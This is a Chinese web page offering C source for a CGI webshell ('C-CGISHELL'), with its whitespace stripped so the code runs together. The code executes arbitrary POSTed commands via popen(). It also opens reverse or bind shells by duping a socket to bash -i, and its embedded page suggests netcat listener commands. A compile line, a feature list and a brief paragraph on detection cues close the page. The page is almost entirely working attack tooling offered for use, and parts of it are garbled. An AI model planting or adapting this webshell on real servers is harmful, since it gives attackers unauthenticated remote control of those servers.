Linux C代码实现cgi shell推荐

FILE*command;intsize=atoi(getenv(“CONTENT_LENGTH”));if(size 1500){printf(“Error PostDataisverybig”);exit(0);}char*buffer=malloc(size+1);fread(buffer,1,size,stdin);command=popen(buffer,”r”);charcaracter;while((caracter=fgetc(command))){if(caracter==EOF)break;printf(“%c”,caracter);}pclose(command);free(buffer);exit(0);interror(char*err){perror(err);exit(EXIT_FAILURE);voidparser_get(void){printf(“Content-type:text/html\n\n”);structget_data*s;char*GET=(char*)getenv(“QUERY_STRING”);inti,number_of_get=0,size_get=strlen(GET);if(strlen(GET) 100)exit(0);s=(structget_data*)malloc(number_of_get*sizeof(structget_data));intelement=0;intpositionA=0;intpositionB=0;intid=0;for(i=0;i size_get;i++){if(GET[i]==’=’){id=1;s[element].key[positionA]=’\0′;positionB=0;continue;}if(GET[i]==’ ‘){id=0;s[element].key[positionA]=’\0′;s[element].value[positionB]=’\0′;positionA=0;positionB=0;element++;continue;}if(id==0){s[element].key[positionA]=GET[i];positionA++;}if(id==1){s[element].value[positionB]=GET[i];positionB++;}if(i==size_get-1 GET[size_get-1]!=’ ‘){s[element].key[positionA]=’\0′;s[element].value[positionB]=’\0′;element++;continue;}}char*host_x=(char*)malloc(100);host_x=NULL;char*type_x=(char*)malloc(100);type_x=NULL;intport_x=0;for(i=0;i element;i++){if(strcmp(s[i].key,”type”)==0)type_x=s[i].value;elseif(strcmp(s[i].key,”host”)==0)host_x=s[i].value;elseif(strcmp(s[i].key,”port”)==0)port_x=atoi(s[i].value);}free(s);if(type_x==NULL){free(type_x);free(host_x);exit(0);}if((strcmp(type_x,””)==0)||port_x =0||port_x 65535){printf(“Somethingiswrong…!!!”);free(type_x);free(host_x);exit(0);}if((strcmp(type_x,”reverse”)==0) (strcmp(host_x,””)==0)){printf(“Youmustspecifyatargethost…”);free(type_x);free(host_x);exit(0);}if(strcmp(type_x,”reverse”)==0){structsockaddr_inaddr;intmsocket;msocket=socket(AF_INET,SOCK_STREAM,0);if(msocket 0){printf(” fontcolor=’red’ Failtocreatesocket /font 
free(host_x);free(type_x);exit(0);}addr.sin_family=AF_INET;addr.sin_port=htons(port_x);addr.sin_addr.s_addr=inet_addr(host_x);memset( addr.sin_zero,0,sizeof(addr.sin_zero));if(connect(msocket,(structsockaddr*) addr,sizeof(addr))==-1){printf(” fontcolor=’red’ Failtoconnect /font \n”);free(host_x);free(type_x);exit(0);}printf(” fontcolor=’006600′ Connectwithsucess!!! /font \n”);if(fork()==0){close(0);close(1);close(2);dup2(msocket,0);dup2(msocket,1);dup2(msocket,2);execl(“/bin/bash”,”bash”,”-i”,(char*)0);close(msocket);exit(0);}free(host_x);free(type_x);exit(0);}elseif(strcmp(type_x,”bind”)==0){intmy_socket,cli_socket;structsockaddr_inserver_addr,cli_addr;if((my_socket=socket(AF_INET,SOCK_STREAM,0))==-1){printf(” fontcolor=’red’ Failtocreatesocket /font exit(1);}server_addr.sin_family=AF_INET;server_addr.sin_port=htons(port_x);server_addr.sin_addr.s_addr=INADDR_ANY;bzero( (server_addr.sin_zero),8);intoptval=1;setsockopt(my_socket,SOL_SOCKET,SO_REUSEADDR, optval,sizeofoptval);if(bind(my_socket,(structsockaddr*) server_addr,sizeof(structsockaddr))==-1){printf(” fontcolor=’red’ Failtobind /font free(host_x);free(type_x);exit(1);}if(listen(my_socket,1) 0){printf(” fontcolor=’red’ Failtolisten /font free(host_x);free(type_x);exit(1);}else{printf(” fontcolor=’006600′ Listenonport%d /font \n”,port_x);}if(fork()==0){socklen_ttamanho=sizeof(structsockaddr_in);if((cli_socket=accept(my_socket,(structsockaddr*) cli_addr, tamanho)) 0){exit(0);}close(0);close(1);close(2);dup2(cli_socket,0);dup2(cli_socket,1);dup2(cli_socket,2);execl(“/bin/bash”,”bash”,”-i”,(char*)0);close(cli_socket);}}free(host_x);free(type_x);exit(0);voidload_css_js(void){printf(” styletype=\”text/css\” 
\n\#page-wrap{\n\margin:20pxauto;\n\width:750px;\n\h1{\n\font-family:Impact,Charcoal,sans-serif;\n\text-shadow:-1px0black,01pxblack,\n\1px0black,0-1pxblack;\n\color:gray;\n\border:#00ff00;\n\body{\n\background-color:white;\n\input[type=\”text\”]{\n\margin-bottom:10px;\n\border:1pxsolidgray;\n\color:black;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\hr{\n\color:gray;\n\input[type=\”submit\”],input[type=\”button\”]{\n\margin-bottom:10px;\n\border:1pxsolidgray;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\#bind_reverse{\n\display:none;\n\label{\n\position:relative;\n\clear:left;\n\float:left;\n\width:15em;\n\margin-right:5px;\n\text-align:right;\n\margin-top:5px;\n\div.scroll{\n\border:1pxsolidgray;\n\margin-bottom:10px;\n\color:black;\n\font-family:Tahoma,sans-serif;\n\padding:5px;\n\width:745px;\n\height:295px;\n\overflow:auto;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\#cmd_rev{\n\position:absolute;\n\margin-left:450px;\n\top:150px;\n\width:250px;\n\overflow:auto;\n\#cmd_bin{\n\position:absolute;\n\margin-left:450px;\n\top:300px;\n\width:250px;\n\overflow:auto;\n\#rev_s{\n\display:inline;\n\#bind_s{\n\display:inline;\n\ /style \n\ scripttype=\”text/javascript\” \n\functionexec_cmd(){\n\varRrequest=newXMLHttpRequest();\n\varcmd_x=document.getElementById(\”xxx\”);\n\varresult=document.getElementById(\”result\”);\n\if(cmd_x.value==”)return;\n\if(cmd_x.value==’clear’||cmd_x.value==’reset’){result.innerHTML=”;return;}\n\varvv=cmd_x.value;\n\vv=vv.replace(/ /g,\” #60\”);\n\vv=vv.replace(/ /g,\” #62\”);\n\result.innerHTML+=\” pre b \\$ /b \”+vv+\” /pre \n\varbodyx=”;\n\Rrequest.open(\”POST\”,window.location.href,true);\n\Rrequest.setRequestHeader(\”Content-type\”,\”text/plain\”);\n\Rrequest.send(cmd_x.value);\n\Rrequest.onreadystatechange=function(){\n\if(Rrequest.status==200){\n\if(Rrequest.readyState==4||Rrequest.readyState==\”complete\”){\n\varcomplete_cont=Rrequest.responseText;\n\complete_cont=complete_cont.replace(/ /g,\” 
#60\”);\n\complete_cont=complete_cont.replace(/ /g,\” #62\”);\n\result.innerHTML+=’ pre ‘+complete_cont+’ /pre \n\result.scrollTop=result.scrollHeight;\n\}\n\}else{\n\if(Rrequest.readyState==4||Rrequest.readyState==\”complete\”){\n\result.innerHTML+=\” pre b error! /b /pre \n\returnfalse;\n\}\n\}\n\}\n\functionload_bind(){\n\varchange_link=document.getElementById(\”change_link\”);\n\varlinkz=change_link.innerHTML;\n\if(linkz==’REVERSE/BIND’){\n\change_link.innerHTML=\”COMMANDLINE\”;\n\document.getElementById(\”cmd_line\”).style.display=’none’;\n\document.getElementById(\”bind_reverse\”).style.display=’block’;\n\}\n\\n\else{\n\document.getElementById(\”bind_reverse\”).style.display=’none’;\n\document.getElementById(\”cmd_line\”).style.display=’block’;\n\change_link.innerHTML=’REVERSE/BIND’;\n\}\n\functionupdate_div(su,xxxd){\n\varstatus=document.getElementById(xxxd);\n\if(su.value==0||su.value==\”\”){\n\status.innerHTML=\”\”;\n\returnfalse;\n\}\n\if(xxxd==’cmd_rev’){\n\status.innerHTML=\” pre nc-v-l\”+su.value+\” /pre \n\returntrue;\n\}\n”);printf(“\tvarserver_ip=’%s’;\n”,getenv(“SERVER_ADDR”));printf(“\tstatus.innerHTML=\” pre nc-v\”+server_ip+\”\”+su.value+\” /pre \n\returntrue;\n\functionchange_div(ev,field){\n\if(ev.keyCode==8||ev.keyCode==37||\n\ev.keyCode==38||ev.keyCode==39||\n\ev.keycode==40||ev.keyCode==46){\n\returntrue;\n\}\n\if(ev.charCode 48||ev.charCode 57){\n\returnfalse;\n\}\n\\n\if(field.value 65535){\n\returnfalse;\n\}\n\returntrue;\n\functionconnect_xxx(div_t){\n\varget_s=”;\n\if(div_t==’rev_s’){\n\varhost_rev=document.getElementById(\”host_rev\”);\n\varport_rev=document.getElementById(\”port_rev\”);\n\if(host_rev.value==”||port_rev==”)returnfalse;\n\get_s=’/?type=reverse host=’+host_rev.value+’ port=’+port_rev.value;\n\}elseif(div_t==’bind_s’){\n\varport_bind=document.getElementById(\”port_bin\”);\n\if(port_bin.value==”)returnfalse;\n\get_s=’/?type=bind 
port=’+port_bin.value;\n\}\n\vartarget_div=document.getElementById(div_t);\n\target_div.innerHTML=\”Wait…\”;\n\varconnect_s=newXMLHttpRequest();\n\connect_s.open(\”GET\”,window.location.href+get_s,true);\n\connect_s.timeout=3000;\n\connect_s.ontimeout=function(){\n\target_div.innerHTML=\” fontcolor=’006600′ ListenOK!!! /font \”\n\connect_s.onreadystatechange=function(){\n\if(connect_s.status==200){\n\if(connect_s.readyState==4||connect_s.readyState==\”complete\”){\n\target_div.innerHTML=connect_s.responseText;\n\}\n\}else{\n\if(connect_s.readyState==4||connect_s.readyState==\”complete\”){\n\result.innerHTML+=\” b error! /b \n\returnfalse;\n\}\n\}\n\}\n\connect_s.send();\n\ /script intmain(void){if(strcmp(getenv(“REQUEST_METHOD”),”POST”)==0)exec_cmd();if(strcmp(getenv(“QUERY_STRING”),””)!=0)parser_get();printf(“Content-type:text/html\n\n”);printf(” html \n”);printf(“\t head \n\t metahttp-equiv=\”Content-type\”content=\”text/html;charset=UTF-8\” \n”);printf(“\t\t title CCGISHELL=D /title \n”);load_css_js();printf(“\n\t /head \n”);printf(“\t body \n”);printf(“\n\ divid=\”page-wrap\” \n\ h1 C-CGISHELL /h1 pre C0d3r: b webshell /b | aid=’change_link’href=’javascript:load_bind()’ REVERSE/BIND /a /pre \n\ divid=’cmd_line’ \n\ inputtype=\”text\” “width:300px;\”id=\”xxx\”onkeyup=\”if(event.keyCode==13)document.getElementById(‘lol’).click()\” \n\ inputid=\”lol\”type=\”button\”value=\”RunCommand\” “exec_cmd()\” br/ \n\ div “scroll\”id=’result’ /div \n\ /div \n\ divid=’bind_reverse’ \n\ pre b ReverseConnection: divid=’rev_s’ fontcolor=’red’ Stop /font /div /b /pre \n\ pre label Host/IP: /label inputtype=\”text\”id=’host_rev’/ /pre \n\ pre label Port: /label inputtype=\”text\”id=’port_rev’onkeypress=’returnchange_div(event,this);’onKeyUp=’update_div(this,\”cmd_rev\”);’/ /pre \n\ inputtype=’button’value=’StartConnection’ “margin-left:15.5em;\” “connect_xxx(‘rev_s’)\”/ \n\ divid=’cmd_rev’ /div \n\ hr \n\ pre b BindConnection: divid=’bind_s’ fontcolor=’red’ Stop /font /div /b /pre 
\n\ pre label PortToListen: /label inputtype=\”text\”id=’port_bin’ “width:50px\”onkeypress=’returnchange_div(event,this);’onKeyUp=’update_div(this,\”cmd_bin\”);’ /pre \n\ inputtype=’button’value=’StartConnection’ “margin-left:15.5em;\” “connect_xxx(‘bind_s’)\”/ \n\ divid=’cmd_bin’ /div \n\ /div \n\ /div \n\ /body \n\ /html \n\return0;}

编译:gcc shell.c -o shell.cgi

功能:

1. 反弹获得 shell(target 作为客户端,主动连接 host 参数指定的地址和 port 参数指定的端口)

2. 监听获得 shell(target 作为服务端,在 port 参数指定的端口上监听,绑定地址为 INADDR_ANY)

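3. 命令行执行(POST 请求体原样交给 popen() 执行,输出回显到页面)

所示代码中没有任何身份校验,能访问该 CGI 地址的人都可以使用以上三种功能。检测时可关注:Web 服务器的 CGI 进程通过 popen() 或 execl("/bin/bash", "bash", "-i") 派生 shell,以及该进程主动外连或新开监听端口。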
